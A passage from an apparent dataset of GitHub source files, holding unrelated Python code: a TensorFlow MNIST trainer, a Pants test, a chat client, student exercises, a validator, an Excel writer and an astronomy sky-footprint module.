In[7]:\n\nvalidation_images=images[:Validation_size]\nvalidation_labels=hot_label[:Validation_size]\ntrain_images=images[Validation_size:]\ntrain_labels=hot_label[Validation_size:]\n\n\n# Added guassian layer to increase the number of samples , by adding another layer we were able to generate more number of training samples.\n# \n\n# In[8]:\n\n# weight initialization\ndef w_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\ndef b_variable(shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\ndef conv2d(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\ndef mpool(x):\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\ndef gaussian_noise_layer(input_layer, std):\n noise = tf.random_normal(shape=tf.shape(input_layer), mean=0.0, stddev=std, dtype=tf.float32) \n return input_layer + noise\n\n\n# In[9]:\n\nepochs_completed = 0\nindex_in_epoch = 0\nnum_examples = train_images.shape[0]\n# serve data by batches\ndef next_batch(batch_size):\n global train_images\n global train_labels\n global index_in_epoch\n global epochs_completed\n start = index_in_epoch\n index_in_epoch += batch_size\n # when all trainig data have been already used, it is reorder randomly \n if index_in_epoch > num_examples:\n # finished epoch\n epochs_completed += 1\n # shuffle the data\n perm = np.arange(num_examples)\n np.random.shuffle(perm)\n train_images = train_images[perm]\n train_labels = train_labels[perm]\n # start next epoch\n start = 0\n index_in_epoch = batch_size\n assert batch_size <= num_examples\n end = index_in_epoch\n return train_images[start:end], train_labels[start:end]\n\n\n# In[10]:\n\nstd=tf.placeholder('float');\nx = tf.placeholder('float', shape=[None, image_size]);\n#W=tf.placeholder('float',shape=[images.shape[1],10])\ny_=tf.placeholder('float',shape=[None,label])\ntrain_=tf.placeholder('int32');\nkeep_prob = tf.placeholder('float')\nkeep_prob1 = tf.placeholder('float')\n\n\n# In[11]:\n\nW_conv1 = w_variable([5, 5, 1, 32])\nb_conv1 = b_variable([32])\nimage = tf.reshape(x, [-1,image_width , image_height,1]);\nif train_==1:\n image=gaussian_noise_layer(image,std);\n resized_image = tf.image.resize_images(image, [32, 32])\n distorted_image = tf.random_crop(resized_image, [28, 28, 1])\n distorted_image = tf.image.random_brightness(distorted_image, max_delta=63)\n distorted_image = tf.image.random_contrast(distorted_image, lower=0.2, upper=1.8)\n image = tf.image.per_image_whitening(distorted_image)\ngraph = tf.get_default_graph()\nh_conv1 = tf.nn.relu(conv2d(image, W_conv1) + b_conv1)\nh_pool1 = mpool(h_conv1)\n#h_pool1 = tf.nn.dropout(h_pool1,keep_prob1);\n# second convolutional layer\nW_conv2 = w_variable([5, 5, 32, 64])\nb_conv2 = b_variable([64])\nh_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)\nh_pool2 = mpool(h_conv2)\nW_conv3=w_variable([1,1,64,64])\nb_conv3=b_variable([64])\nh_pool2=tf.nn.relu(conv2d(h_pool2,W_conv3)+b_conv3);\n#h_pool2 = tf.nn.dropout(h_pool2,keep_prob1);\nW_fc1 = w_variable([7 * 7 * 64, 1024])\nb_fc1 = b_variable([1024])\nh_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])\nh_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\nh_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n#this is the output layer\nW_fc2 = w_variable([1024, label])\nb_fc2 = b_variable([label])\ny = tf.nn.log_softmax(tf.matmul(h_fc1_drop, W_fc2) + b_fc2)\n# optimisation function\ncross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y))\ntrain_step = tf.train.AdamOptimizer(LEARNING_RATE).minimize(cross_entropy)\ncorrect_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, 'float'))\npredict = tf.argmax(y,1)\ninit = tf.initialize_all_variables()\nsess = tf.InteractiveSession()\nsaver = tf.train.Saver()\n\n\n# In[12]:\n\ncheck=input('Enter do you wanna load file or run a new model(yes/no)');\nif check=='yes' or check=='YES':\n LOAD_FILE=input(\"Enter the name of the model to load the tensorflow model\");\n try:\n saver = tf.train.import_meta_graph(LOAD_FILE+'.meta');\n saver.restore(sess, LOAD_FILE)\n except :\n print('File Do not exist')\nelse:\n sess.run(init)\n SAVING_FILE=input(\"Enter the name of the model to save the tensorflow\");\n# evaluation\n\n\n# In[14]:\n\n# visualisation variables\ntrain_accuracies = []\nvalidation_accuracies = []\nx_range = []\ndisplay_step=1\nfor i in range(TRAINING_ITERATIONS):\n #get new batch\n batch_xs, batch_ys = next_batch(50) \n if(i%100==0):\n print(\"step:\"+str(i))\n if(Validation_size):#this is done to make sure that in case we make validation size 0 , we can simply avoid printing it\n validation_accuracies.append(sess.run(accuracy,feed_dict={x:validation_images,y_:validation_labels,keep_prob:1.0,std:0.0,train_:0}));\n train_accuracies.append((sess.run(accuracy,feed_dict={x:batch_xs,y_:batch_ys,keep_prob:1.0,std:0.0,train_:0})));\n print(\"Validation Accuracy:\"+str(validation_accuracies[len(validation_accuracies)-1])); \n sess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys, keep_prob: DROPOUT,std:0.001,train_:1})\nif check=='Yes' or check=='yes':\n check_1=input(\"Do you want to save file with same name or not?(yes/No)\");\n if(check_1=='no'):\n temp=input(\"File name\");\n saver.save(sess,temp);\n else:\n saver.save(sess,LOAD_FILE);\nelse:\n saver.save(sess, SAVING_FILE);#this is where we save our training model which can be used later\n\n\n# In[ ]:\n\nprint(validation_accuracies[len(validation_accuracies)-1]);\nline1=plt.plot(train_accuracies,label='Training Value')\nline2=plt.plot(validation_accuracies,label='Validation Value')\nplt.legend(loc=4)\nplt.ylabel('Accuracies->');\nplt.xlabel('Iterations(x100)->');\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n# \n","repo_name":"karangoel16/MNIST","sub_path":"TENSORFLOW_MNIST.py","file_name":"TENSORFLOW_MNIST.py","file_ext":"py","file_size_in_byte":7045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27765888699","text":"import os\nfrom pathlib import Path\n\nfrom pants.base.build_environment import get_buildroot\nfrom pants.option.scope import GLOBAL_SCOPE_CONFIG_SECTION\nfrom pants.testutil.pants_run_integration_test import PantsRunIntegrationTest\n\n\nclass RunnerIntegrationTest(PantsRunIntegrationTest):\n \"\"\"Test logic performed in PantsRunner.\"\"\"\n\n def test_warning_filter(self):\n # We load the testprojects pants-plugins to get some testing tasks and subsystems.\n cmdline = [\n \"--no-enable-pantsd\",\n f\"--pythonpath=+['{Path(get_buildroot(), 'testprojects/pants-plugins/src/python')}']\",\n \"--backend-packages=+['test_pants_plugin']\",\n # This task will always emit a DeprecationWarning.\n \"deprecation-warning-task\",\n ]\n\n warning_run = self.run_pants(cmdline)\n self.assert_success(warning_run)\n self.assertRegex(\n warning_run.stderr_data,\n \"\\\\[WARN\\\\].*DeprecationWarning: DEPRECATED: This is a test warning!\",\n )\n\n non_warning_run = self.run_pants(\n cmdline,\n config={\n GLOBAL_SCOPE_CONFIG_SECTION: {\n # NB: We do *not* include the exclamation point at the end, which tests that the regexps\n # match from the beginning of the warning string, and don't require matching the entire\n # string! We also lowercase the message to check that they are matched case-insensitively.\n \"ignore_pants_warnings\": [\"deprecated: this is a test warning\"]\n },\n },\n )\n self.assert_success(non_warning_run)\n self.assertNotIn(\"test warning\", non_warning_run.stderr_data)\n\n def test_parent_build_id_set_only_for_pants_runs_called_by_other_pants_runs(self):\n with self.temporary_workdir() as workdir:\n command = [\n \"run\",\n \"testprojects/src/python/nested_runs\",\n \"--\",\n workdir,\n ]\n result = self.run_pants_with_workdir(command, workdir,)\n self.assert_success(result)\n\n run_tracker_dir = os.path.join(workdir, \"run-tracker\")\n self.assertTrue(\n os.path.isdir(run_tracker_dir), f\"dir path {run_tracker_dir} does not exist!\"\n )\n run_tracker_sub_dirs = (\n os.path.join(run_tracker_dir, dir_name)\n for dir_name in os.listdir(run_tracker_dir)\n if dir_name != \"latest\"\n )\n for run_tracker_sub_dir in run_tracker_sub_dirs:\n info_path = os.path.join(run_tracker_sub_dir, \"info\")\n self.assert_is_file(info_path)\n with open(info_path, \"r\") as info_f:\n lines = dict(line.split(\": \", 1) for line in info_f.readlines())\n if \"goals\" in lines[\"cmd_line\"]:\n self.assertIn(\"parent_build_id\", lines)\n else:\n self.assertNotIn(\"parent_build_id\", lines)\n","repo_name":"mgrenonville/pants","sub_path":"tests/python/pants_test/bin/test_runner_integration.py","file_name":"test_runner_integration.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"25610152378","text":"#! /usr/bin/env python \n#coding:utf-8\n'''\nCreated on 2016年5月18日\n\n@author: chenzhen\n'''\nfrom asynchat import async_chat\nimport socket\nimport asyncore\nimport wx\n\nclass Client(async_chat):\n def __init__(self, host, port, window):\n self.window = window\n self.data = []\n async_chat.__init__(self)\n self.create_socket(socket.AF_INET, socket.SOCK_STREAM)\n self.connect((host, port))\n \n self.window.button.Bind(wx.EVT_BUTTON, self.OnSend)\n \n def handle_connect(self, text='hello**end**'):\n self.push(text)\n #self.push('hello**end**')\n \n #self.window.button.Bind(wx.EVT_BUTTON, self.OnSend)\n self.set_terminator('\\r\\n')\n \n def collect_incoming_data(self, data):\n data = data.decode('utf8')\n self.data.append(data)\n \n def found_terminator(self):\n receive_message = ''.join(self.data) + '\\r\\n'\n self.data = []\n self.window.control.WriteText(receive_message)\n \n def OnSend(self, event):\n if self.window.control2.GetValue():\n message = self.window.control2.GetValue().encode('utf8') + \"**end**\"\n self.send(message)\n self.window.control2.SetValue('')\n\n \n \n \nif __name__ == '__main__':\n message = 'adjfdjfjjdf**end**'\n clinet = Client('localhost', 8080, message)\n asyncore.loop()\n\n \n","repo_name":"czsvn/GTalk","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"47463486330","text":"\"\"\" created by stips on 24.10.18. using PyCharm , python_version = 3.5 \"\"\"\n\ndef iterativnaOkretaljka(lista, start, stop):\n '''\n funkcija okrece elemente od startanog indeksa do stop indeksa nad elementima liste lista\n for petlja do onoliko clanova koliko elementa ima izmedeu indeksa / 2\n :param lista:\n :param start:\n :param stop:\n :return:\n '''\n for i in range((stop-start+1)//2):\n lista[start+i], lista[stop-i] = lista[stop-i], lista[start+i]\n return lista\n\ndef rekurzivnaOkretaljkaNoSlice(lista, start, stop, i = 0):\n '''\n uvjet izlaska je da je prijedeno pola puta u rasponu\n inace prebacuj elemente i kreci se listom\n :param lista:\n :param start:\n :param stop:\n :param i:\n :return:\n '''\n if i == (stop - start + 1) // 2:\n return lista\n lista[start:start + i:], lista[stop:stop - i] = lista[stop:stop - i], lista[start:start + i]\n i += 1\n return rekurzivnaOkretaljkaSlice(lista, start, stop, i)\n\ndef rekurzivnaOkretaljkaSlice(lista, start, stop, i=0):\n '''\n uvjet izlaska je da je prijedeno pola puta u rasponu\n inace prebacuj elemente i kreci se listom\n :param lista: \n :param start: \n :param stop: \n :param i: \n :return: \n '''\n if i == (stop-start+1)//2:\n return lista\n lista[start+i], lista[stop-i] = lista[stop-i], lista[start+i]\n i+=1\n return rekurzivnaOkretaljkaSlice(lista, start, stop, i)\n\nif __name__ == '__main__':\n lst = [2, 4, 6, 3, 9, 'a']\n\n print(\"Orginal\", lst)\n\n print(\"Interativly swapped\", iterativnaOkretaljka(lst, 1, 4))\n print(\"Recursivly swapped\", rekurzivnaOkretaljkaNoSlice(lst, 1, 4))\n print(\"Recursivly slicley swapped\", rekurzivnaOkretaljkaSlice(lst, 1, 4))","repo_name":"Stips5/Metode-optimizacije","sub_path":"vjezba2/medak_stipan_zadatak2.py","file_name":"medak_stipan_zadatak2.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"bs","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3290189236","text":"# -*- coding: utf-8\r\n#\r\n# Программа к учебному пособию\r\n# К.Ю. Поляков. Программирование на языках Python и C++\r\n# Часть 2 (9 класс)\r\n# Программа № 29. Линейный поиск\r\n#\r\n\r\nA = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\r\nN = len(A)\r\nX = 6\r\ni = 0\r\nwhile i < N and A[i] != X:\r\n i += 1\r\n\r\nif i < N:\r\n print( \"A[{}]={}\".format(i,X) )\r\nelse:\r\n print( \"Не нашли!\" )\r\n\r\nnX = -1\r\nfor i in range(N):\r\n if A[i] == X:\r\n nX = i\r\n break\r\n\r\nif nX >= 0:\r\n print( \"A[{}]={}\".format(i,X) )\r\nelse:\r\n print( \"Не нашли!\" )\r\n\r\nfor i in range(N):\r\n if A[i] == X:\r\n print( \"A[{}]={}\".format(i,X) )\r\n break\r\nelse:\r\n print( \"Не нашли!\" )\r\n\r\nif X in A:\r\n nX = A.index(X)\r\n print( \"A[{}]={}\".format(i,X) )\r\nelse:\r\n print( \"Не нашли!\" )\r\n\r\n\r\n","repo_name":"olgaObnosova/EGE","sub_path":"9prog_python/29-arrays-search.py","file_name":"29-arrays-search.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"38749995193","text":"from .ValidatorBase import ValidatorBase\nfrom Models import Session, Term\n\nclass TermValidator(ValidatorBase):\n \"\"\"Configures the Term validator to the parent class applies the validators correctly.\"\"\"\n\n def __init__(self, obj_data):\n \"\"\"Gets the object data that will be validated and initializes the configurations.\"\"\"\n\n self.request = obj_data\n\n self.validate_config = {\n 'name': {\n 'key_required': True,\n 'field_required': True,\n 'max_length': 100,\n 'min_length': 1,\n 'is_unique': True\n },\n 'display_name': {\n 'key_required': True,\n 'field_required': True,\n 'max_length': 100,\n 'min_length': 1\n },\n 'description': {\n 'key_required': True,\n 'max_length': 255\n },\n 'parent_id': {\n 'is_integer': True\n },\n 'page_id': {\n 'is_integer': True\n },\n 'taxonomy_id': {\n 'key_required': True,\n 'field_required': True,\n 'is_integer': True\n },\n 'language_id': {\n 'key_required': True,\n 'field_required': True,\n 'is_integer': True\n }\n }\n\n self.errors = []\n self.has_error = False\n self.complete_key_list = True\n self.model = Term\n self.session = Session\n","repo_name":"welisonmenezes/comsys","sub_path":"application/api/Validators/TermValidator.py","file_name":"TermValidator.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70338485992","text":"import xlwt\nimport pandas as pd\nfrom collections import OrderedDict\nimport os\nfrom functools import reduce\n\nscript = os.path.dirname(__file__)\nprint(script)\nhead_list = ['', '']\n\ndata_dict = OrderedDict()\n\ndata = pd.DataFrame(data_dict, index=head_list)\n# mean_data是序列\nmean_data = data.mean(axis=1)\nlist_mean = [round(i, 2) for i in mean_data]\nmean_value = reduce(lambda x, y: x + y, list_mean) / len(list_mean)\nlist_mean.append(mean_value)\ndata_dict[\"Mean\"] = list_mean\n\noutfile = os.path.join(script, \"result.xlsx\")\nwriter = xlwt.Workbook()\nws = writer.add_sheet('sheet1')\nfor index, head in enumerate(head_list):\n ws.write(0, index + 1, head)\n\ncount = 1\nfor key, values in data_dict.items():\n ws.write(count, 0, key)\n for index, value in enumerate(values):\n ws.write(count, index + 1, value)\n count += 1\nwriter.save(outfile)\n","repo_name":"zbh123/hobby","sub_path":"数据处理/excel文件写入.py","file_name":"excel文件写入.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"36475242604","text":"\"\"\"\nUm posto está vendendo combustíveis com a seguinte tabela de descontos:\n\n a. Álcool:\n b. até 20 litros, desconto de 3% por litro\n c. acima de 20 litros, desconto de 5% por litro\n d. Gasolina:\n e. até 20 litros, desconto de 4% por litro\n f. acima de 20 litros, desconto de 6% por litro\n\n Escreva um algoritmo que leia o número de litros vendidos, o tipo de combustível\n (codificado da seguinte forma: A-álcool, G-gasolina),\n calcule e imprima o valor a ser pago pelo cliente sabendo-se que o preço do litro da gasolina é R$ 2,50\n o preço do litro do álcool é R$ 1,90.\n\"\"\"\n\nlitros = int(input('Quantidade de litros colocado? '))\nforma = input('Álcool ou Gasolina? (A-álcool, G-gasolina) ').upper()\nprecolitro = 0\npreco = 0\n\nif forma == 'A':\n if litros <= 20:\n precolitro = 1.843\n preco = litros * precolitro\n print(f'O valor a ser pago será de R${preco:.2f}, sendo colocado {litros} litros de álcool.')\n elif litros > 20:\n precolitro = 1.805\n preco = litros * precolitro\n print(f'O valor a ser pago será de R${preco:.2f}, sendo colocado {litros} litros de álcool.')\nelif forma == 'G':\n if litros <= 20:\n precolitro = 2.4\n preco = litros * precolitro\n print(f'O valor a ser pago será de R${preco:.2f}, sendo colocado {litros} litros de gasolina.')\n elif litros > 20:\n precolitro = 2.35\n preco = litros * precolitro\n print(f'O valor a ser pago será de R${preco:.2f}, sendo colocado {litros} litros de gasolina.')\n","repo_name":"fredy-prudente/python-brasil-exercicios","sub_path":"Estrutura De Decisao/ex26.py","file_name":"ex26.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6328436816","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n#import packages\nfrom keras.models import model_from_json\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow import keras\nimport glob\n\n\n# In[1]:\n\n\n#preprocess the images and keep a list of the unprocessed images.\ndef process_images(data_path):\n files = glob.glob(data_path)\n data = []\n for f1 in files:\n img = keras.preprocessing.image.load_img(f1)\n #[m,n,k] = np.shape(img)\n #switch when new model is trained\n [m,n,k] = 64,64,3\n img_array = keras.preprocessing.image.load_img(f1, target_size=(m,n,k))\n img_array = keras.preprocessing.image.img_to_array(img_array)\n img_array /= 255\n img_array = tf.expand_dims(img_array, 0) # Create batch axis\n data.append(img_array)\n \n return data\n\n\n# In[12]:\n\n\n#use the CNN to predict if any of the images are likely to be cats and populate list if they are\ndef final_answer(data,loaded_model):\n is_cat = np.zeros(len(data))\n for i,img in enumerate(data):\n if loaded_model.predict(img)[0] > .5:\n is_cat[i] = 1\n return is_cat\n\n\n# In[9]:\n\n\nif __name__ == \"__main__\": \n process_images()\n final_answer()\n\n","repo_name":"mont-grunthal/CatFinder","sub_path":"CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3122120729","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''footprints.py - Waqas Bhatti (wbhatti@astro.princeton.edu) - Sep 2018\nLicense: MIT - see the LICENSE file for the full text.\n\nThis contains functions that get info about LC collection footprints.\n\n'''\n\n#############\n## LOGGING ##\n#############\n\nimport logging\nfrom lccserver import log_sub, log_fmt, log_date_fmt\n\nDEBUG = False\nif DEBUG:\n level = logging.DEBUG\nelse:\n level = logging.INFO\nLOGGER = logging.getLogger(__name__)\nlogging.basicConfig(\n level=level,\n style=log_sub,\n format=log_fmt,\n datefmt=log_date_fmt,\n)\n\nLOGDEBUG = LOGGER.debug\nLOGINFO = LOGGER.info\nLOGWARNING = LOGGER.warning\nLOGERROR = LOGGER.error\nLOGEXCEPTION = LOGGER.exception\n\n#############\n## IMPORTS ##\n#############\n\nimport pickle\nimport os.path\nimport math\nimport subprocess\nimport shutil\n\nimport numpy as np\nfrom scipy.spatial import Delaunay\n\ntry:\n from astropy.coordinates import SkyCoord\n\n from shapely.ops import cascaded_union, polygonize\n import shapely.geometry as geometry\n from shapely.geometry.polygon import Polygon\n from shapely.geometry.multipolygon import MultiPolygon\n\n import matplotlib\n import matplotlib.patheffects as path_effects\n matplotlib.use('Agg')\n import matplotlib.pyplot as plt\n import scour\n\nexcept ImportError:\n raise ImportError(\n \"The following packages must be installed (via pip) \"\n \"to use this module: \"\n \"matplotlib>=2.0, shapely>=1.6, astropy>=3.0, and scour>=0.37\"\n )\n\n\nfrom .dbsearch import sqlite_column_search\nfrom .datasets import results_limit_rows, results_random_sample\n\n\n#################\n## ALPHA SHAPE ##\n#################\n\n# generating a concave hull (or \"alpha shape\") of RADEC coverage, using the\n# Delaunay triangulation and removing triangles with too large area.\n#\n# originally from:\n# http://blog.thehumangeo.com/2014/05/12/drawing-boundaries-in-python/\n#\ndef alpha_shape(points, alpha):\n \"\"\"Compute the alpha shape (concave hull) of a set of points.\n\n https://en.wikipedia.org/wiki/Alpha_shape\n\n @param points: Iterable container of points.\n @param alpha: alpha value to influence the\n gooeyness of the border. Smaller numbers\n don't fall inward as much as larger numbers.\n Too large, and you lose everything!\n\n The returned things are:\n\n a shapely.Polygon object, a list of edge points\n\n To get a list of points making up the Polygon object, do:\n\n >>> extcoords = np.array(concave_hull.exterior.coords)\n\n \"\"\"\n if len(points) < 4:\n # When you have a triangle, there is no sense\n # in computing an alpha shape.\n return geometry.MultiPoint(list(points)).convex_hull\n\n def add_edge(edges, edge_points, coords, i, j):\n \"\"\"\n Add a line between the i-th and j-th points,\n if not in the list already\n \"\"\"\n if (i, j) in edges or (j, i) in edges:\n # already added\n return\n\n edges.add( (i, j) )\n edge_points.append(coords[ [i, j] ])\n\n tri = Delaunay(points)\n edges = set()\n edge_points = []\n # loop over triangles:\n # ia, ib, ic = indices of corner points of the\n # triangle\n for ia, ib, ic in tri.simplices:\n pa = points[ia]\n pb = points[ib]\n pc = points[ic]\n # Lengths of sides of triangle\n a = math.sqrt((pa[0]-pb[0])**2 + (pa[1]-pb[1])**2)\n b = math.sqrt((pb[0]-pc[0])**2 + (pb[1]-pc[1])**2)\n c = math.sqrt((pc[0]-pa[0])**2 + (pc[1]-pa[1])**2)\n # Semiperimeter of triangle\n s = (a + b + c)/2.0\n # Area of triangle by Heron's formula\n area = math.sqrt(s*(s-a)*(s-b)*(s-c))\n circum_r = a*b*c/(4.0*area)\n # Here's the radius filter.\n # print circum_r\n if circum_r < 1.0/alpha:\n add_edge(edges, edge_points, points, ia, ib)\n add_edge(edges, edge_points, points, ib, ic)\n add_edge(edges, edge_points, points, ic, ia)\n m = geometry.MultiLineString(edge_points)\n triangles = list(polygonize(m))\n return cascaded_union(triangles), edge_points\n\n\n############################################\n## CONVEX HULL AND ALPHA SHAPE GENERATION ##\n############################################\n\ndef collection_convex_hull(basedir,\n collection,\n randomsample=None,\n limit=None,\n conditions='(ndet > 49)',\n hull_buffer=0.5):\n '''This gets the convex hull for an LC collection.\n\n conditions is a filter string to be passed into the\n dbsearch.sqlite_column_search function.\n\n '''\n\n # get the ra/dec\n res = sqlite_column_search(basedir,\n getcolumns=['ra','decl'],\n conditions=conditions,\n lcclist=[collection])\n\n if res and len(res[collection]['result']) > 0:\n\n rows = res[collection]['result']\n\n if randomsample is not None:\n rows = results_random_sample(rows, sample_count=randomsample)\n\n if limit is not None:\n rows = results_limit_rows(rows,\n rowlimit=limit,\n incoming_userid=1,\n incoming_role='superuser')\n\n ra = np.array([x['ra'] for x in rows])\n decl = np.array([x['decl'] for x in rows])\n points = np.column_stack((ra, decl))\n\n # now generate a shapely convex_hull object that we can pickle\n shapely_points = geometry.MultiPoint(list(points))\n shapely_convex_hull = shapely_points.convex_hull\n if hull_buffer is not None:\n shapely_convex_hull = shapely_convex_hull.buffer(hull_buffer)\n\n return (\n shapely_convex_hull,\n np.array(shapely_convex_hull.exterior.coords)\n )\n\n else:\n\n LOGERROR('no objects found in collection: %s with conditions: %s' %\n (collection, conditions))\n\n\ndef collection_alpha_shape(basedir,\n collection,\n alpha=0.7,\n randomsample=None,\n limit=None,\n conditions='(ndet > 49)',\n hull_buffer=0.5):\n '''This gets the alpha shape (concave hull) for an LC collection.\n\n conditions is a filter string to be passed into the\n dbsearch.sqlite_column_search function.\n\n '''\n # get the ra/dec\n res = sqlite_column_search(basedir,\n getcolumns=['ra','decl'],\n conditions=conditions,\n lcclist=[collection],\n incoming_userid=1,\n incoming_role='superuser')\n\n if res and len(res[collection]['result']) > 0:\n\n rows = res[collection]['result']\n\n if randomsample is not None:\n rows = results_random_sample(rows, sample_count=randomsample)\n\n if limit is not None:\n rows = results_limit_rows(rows,\n rowlimit=limit,\n incoming_userid=1,\n incoming_role='superuser')\n\n ra = np.array([x['ra'] for x in rows])\n decl = np.array([x['decl'] for x in rows])\n points = np.column_stack((ra, decl))\n\n shapely_concave_hull, edge_points = alpha_shape(points,\n alpha=alpha)\n if hull_buffer is not None:\n shapely_concave_hull = shapely_concave_hull.buffer(hull_buffer)\n\n # get the coordinates of the hull\n try:\n\n hull_coords = np.array(shapely_concave_hull.exterior.coords)\n\n except Exception:\n\n LOGWARNING('this concave hull may have multiple '\n 'unconnected sections, the alpha parameter '\n 'might be too high. returning a shapely.MultiPolygon '\n 'object and list of edge coords')\n hull_coords = []\n\n if isinstance(shapely_concave_hull, MultiPolygon):\n\n for geom in shapely_concave_hull:\n hull_coords.append(np.array(geom.exterior.coords))\n\n elif isinstance(shapely_concave_hull, Polygon):\n\n if (shapely_concave_hull.area > 0.0 and\n shapely_concave_hull.exterior):\n\n hull_coords = np.array(shapely_concave_hull.exterior.coords)\n\n else:\n LOGERROR('the concave hull has area = 0.0, '\n 'alpha = %s is likely too high '\n 'for this object' % alpha)\n return shapely_concave_hull, None\n\n else:\n\n LOGERROR('unknown geometry returned')\n return None, None\n\n return shapely_concave_hull, hull_coords\n\n\n####################################\n## COLLECTION FOOTPRINT FUNCTIONS ##\n####################################\n\ndef generate_collection_footprint(\n basedir,\n collection,\n alpha=0.7,\n randomsample=None,\n limit=None,\n conditions='(ndet > 49)',\n hull_buffer=0.5,\n):\n '''This generates the convex and concave hulls for a collection.\n\n Saves them to a collection-footprint.pkl pickle in the collection's\n directory.\n\n '''\n\n convex_hull, convex_boundary_points = collection_convex_hull(\n basedir,\n collection,\n randomsample=randomsample,\n limit=limit,\n conditions=conditions,\n hull_buffer=hull_buffer,\n )\n concave_hull, concave_boundary_points = collection_alpha_shape(\n basedir,\n collection,\n alpha=alpha,\n randomsample=randomsample,\n limit=limit,\n conditions=conditions,\n hull_buffer=hull_buffer,\n )\n\n footprint = {\n 'collection': collection,\n 'args':{\n 'alpha':alpha,\n 'randomsample':randomsample,\n 'limit':limit,\n 'conditions':conditions,\n 'hull_buffer':hull_buffer\n },\n 'convex_hull': convex_hull,\n 'convex_hull_boundary': convex_boundary_points,\n 'concave_hull': concave_hull,\n 'concave_hull_boundary': concave_boundary_points,\n }\n\n outpickle = os.path.join(basedir,\n collection.replace('_','-'),\n 'catalog-footprint.pkl')\n\n with open(outpickle, 'wb') as outfd:\n pickle.dump(footprint, outfd, pickle.HIGHEST_PROTOCOL)\n\n return outpickle\n\n\n#####################################\n## COLLECTION OVERVIEW PLOT MAKING ##\n#####################################\n\ndef collection_overview_plot(collection_dirlist,\n outfile,\n use_hull='concave',\n use_projection='mollweide',\n use_colormap='inferno',\n use_colorlist=None,\n use_alpha=0.5,\n show_galactic_plane=True,\n show_ecliptic_plane=True,\n east_is_left=True,\n dpi=200):\n '''This generates a coverage map plot for all of the collections in\n collection_dirlist.\n\n Writes to outfile. This should probably go into the basedir docs/static\n directory.\n\n Gets the hulls from the catalog-footprint.pkl files in each collection's\n directory.\n\n '''\n\n if isinstance(use_colorlist, (list, tuple)):\n if len(use_colorlist) != len(collection_dirlist):\n LOGERROR(\"the color list provided must have the same \"\n \"length as the collection_dirlist\")\n return None\n\n # label sizes\n matplotlib.rcParams['xtick.labelsize'] = 16.0\n matplotlib.rcParams['ytick.labelsize'] = 16.0\n\n # fonts for the entire thing\n matplotlib.rcParams['font.size'] = 16\n\n # lines\n matplotlib.rcParams['lines.linewidth'] = 2.0\n\n # axes\n matplotlib.rcParams['axes.linewidth'] = 2.0\n matplotlib.rcParams['axes.labelsize'] = 14.0\n\n # xtick setup\n matplotlib.rcParams['xtick.major.size'] = 10.0\n matplotlib.rcParams['xtick.minor.size'] = 5.0\n matplotlib.rcParams['xtick.major.width'] = 1.0\n matplotlib.rcParams['xtick.minor.width'] = 1.0\n matplotlib.rcParams['xtick.major.pad'] = 8.0\n\n # ytick setup\n matplotlib.rcParams['ytick.major.size'] = 10.0\n matplotlib.rcParams['ytick.minor.size'] = 5.0\n matplotlib.rcParams['ytick.major.width'] = 1.0\n matplotlib.rcParams['ytick.minor.width'] = 1.0\n matplotlib.rcParams['ytick.major.pad'] = 8.0\n\n # svg font setup\n plt.rcParams['svg.fonttype'] = 'none'\n\n fig = plt.figure(figsize=(14,12))\n\n ax = fig.add_subplot(111, projection=use_projection)\n ax.set_facecolor('#e2e3e5')\n\n if show_galactic_plane:\n\n LOGINFO('plotting the Galactic plane')\n\n galactic_plane = SkyCoord(\n np.arange(0,360.0,0.25),0.0,frame='galactic',unit='deg'\n ).icrs\n galactic_plane_ra = np.array([x.ra.value for x in galactic_plane])\n galactic_plane_decl = np.array([x.dec.value for x in galactic_plane])\n galra = galactic_plane_ra[::]\n galdec = galactic_plane_decl[::]\n galra[galra > 180.0] = galra[galra > 180.0] - 360.0\n\n if east_is_left:\n galra = -galra\n\n ax.scatter(\n np.radians(galra),\n np.radians(galdec),\n s=25,\n color='#ffc107',\n marker='o',\n zorder=-99,\n label='Galactic plane',\n rasterized=True\n )\n\n if show_ecliptic_plane:\n\n LOGINFO('plotting the ecliptic plane')\n\n # ecliptic plane\n ecliptic_equator = SkyCoord(\n 